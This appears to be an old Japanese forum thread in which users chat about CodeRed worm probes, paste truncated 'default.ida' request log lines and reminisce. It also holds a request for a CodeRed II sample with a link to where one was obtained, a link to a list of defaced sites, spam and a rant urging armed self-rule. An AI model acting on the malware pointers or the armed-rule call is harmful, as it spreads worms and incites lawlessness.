202.201.*.* - - [08/Feb/2002:11:18:33 +0900] "GET /default.ida?NNNNNNNNNNNNNN

155.54.*.* - - [09/Feb/2002:05:40:32 +0900] "GET /default.ida?NNNNNNNNNNNNNNNNN

80.63.*.* - - [10/Feb/2002:00:31:02 +0900] "GET /default.ida?NNNNNNNNNNNNNNN

61.157.*.* - - [10/Feb/2002:10:21:38 +0900] "GET /default.ida?NNNNNNNNNNNNNN

148.243.*.* - - [10/Feb/2002:12:09:00 +0900] "GET /default.ida?NNNNNNNNNNNNNN

210.181.*.* - - [10/Feb/2002:15:23:31 +0900] "GET /default.ida?NNNNNNNNNNNNNN

急に目につくようになりました
誕生一周年記念で復活ですか？

61.171.*.* - - [07/Jul/2002:05:40:36 +0900] "GET /default.ida?NNNNNNNNNNNNNN
207.208.*.* - - [08/Jul/2002:06:46:10 +0900] "GET /default.ida?NNNNNNNNNNNNN
193.50.*.* - - [08/Jul/2002:07:34:56 +0900] "GET /default.ida?NNNNNNNNNNNNNN
210.82.*.* - - [08/Jul/2002:14:05:29 +0900] "GET /default.ida?NNNNNNNNNNNNNN
198.4.*.* - - [08/Jul/2002:16:59:10 +0900] "GET /default.ida?NNNNNNNNNNNNNNN
211.255.*.* - - [08/Jul/2002:23:48:10 +0900] "GET /default.ida?NNNNNNNNNNNNN

.∧＿∧　　／￣￣￣￣￣￣￣￣￣￣￣￣＼
（　´∀｀）＜　お前らまだやってんのかよ　　　|
.　　　　　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿／

懐かしいなあ

月日だけ見てるのか。
つことは１年間潜伏？ｳﾋｰ

Apacheワームじゃないの？

なんでApache狙うのにdefault.idaを叩くんだよ

最期に記念カキコ

今日は多かったのでここに来てみた。
そうか、もう一周年になるのか。
再流行したりすると、またログが大変なことになるなー。

この板が残ってるなんてちょっと感動

CodeRedか..... 夏だな

あれは去年の夏だったか懐かしいな
まだダイヤルですごい重かったんだな

ISOTK ってすごいね。
まだやられっぱなし → ttp://p-web.gr.jp/index.htm

ttp://www.geocities.co.jp/HeartLand-Namiki/1212/
↑ここに改竄されたサイトの一覧が。

スレ違いだとおもうけど、IISが攻撃対象のようなのでとりあえず。。。

この板が残ってるなんてちょっと感動

そんなことで感動できる単純な人間でよかったね。

　

有料サイトでの【サンプル】集めました！！
無料で見れて、絶対オトク！ヌケル！！
http://www.traffimagic.com/WIPE7MMLZCA/comein/JPCKS

お〜
おれの立てたスレがまだ生きてた。
1年以上前なんだなぁ。

なかなか消えないね〜このスレ。
と密かに書いてみるテスト・・・

1000まで誰も気がつかないかなと言ってみる
テスト。。。

なかなかdat落ちしないねぇ

私は、ＣｏｄｅＲｅｄ�Uを研究していますが上手にいきません。
環境を整えても、パケットを吐いてくれないのですがどうすればよいのですか？　それとも、
私が持っているＣｏｄｅＲｅｄ�Uがだめなのかもしれません。だとしたら
どこで、てに入れる事が出来ますか？ちなみに、私はここで手に入れました。
http://ring2.host.sk/page1.php

codeRed�Uの網　何処が張ってるの?

port閉じたら落ちたけど、ICEで検出されてなかった...

>>911 マルチすんな。
http://pc.2ch.net/test/read.cgi/sec/1002385094/42

（＾＾）

（＾＾）

（＾＾）

（＾＾）

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

まだあった。。。

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

Tsinghua Universityとか
Shandong Universityとかから
来るようになった

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

2年目ですなー

まぬけな福田官房長官は逝ってよし。

もう政治家や官僚は私腹をこやす、売国で儲けることしかしないし
モラル無き儲けさえすればいいとの経営陣
もはや日本は国として機能していない
意味の無いやつらに仕切られる筋合いはないので
地域でコミュニティーを作り
行政や警察に頼らない個人個人が武装した自治生活をするべきである
もはやこういう個人武装して自分の身を守る社会に
日本はなっている
意味の無い、きちんと国民のためにならない政府に
各個人は見切りをつけるべきである

あげ

さげ

あげ

さげ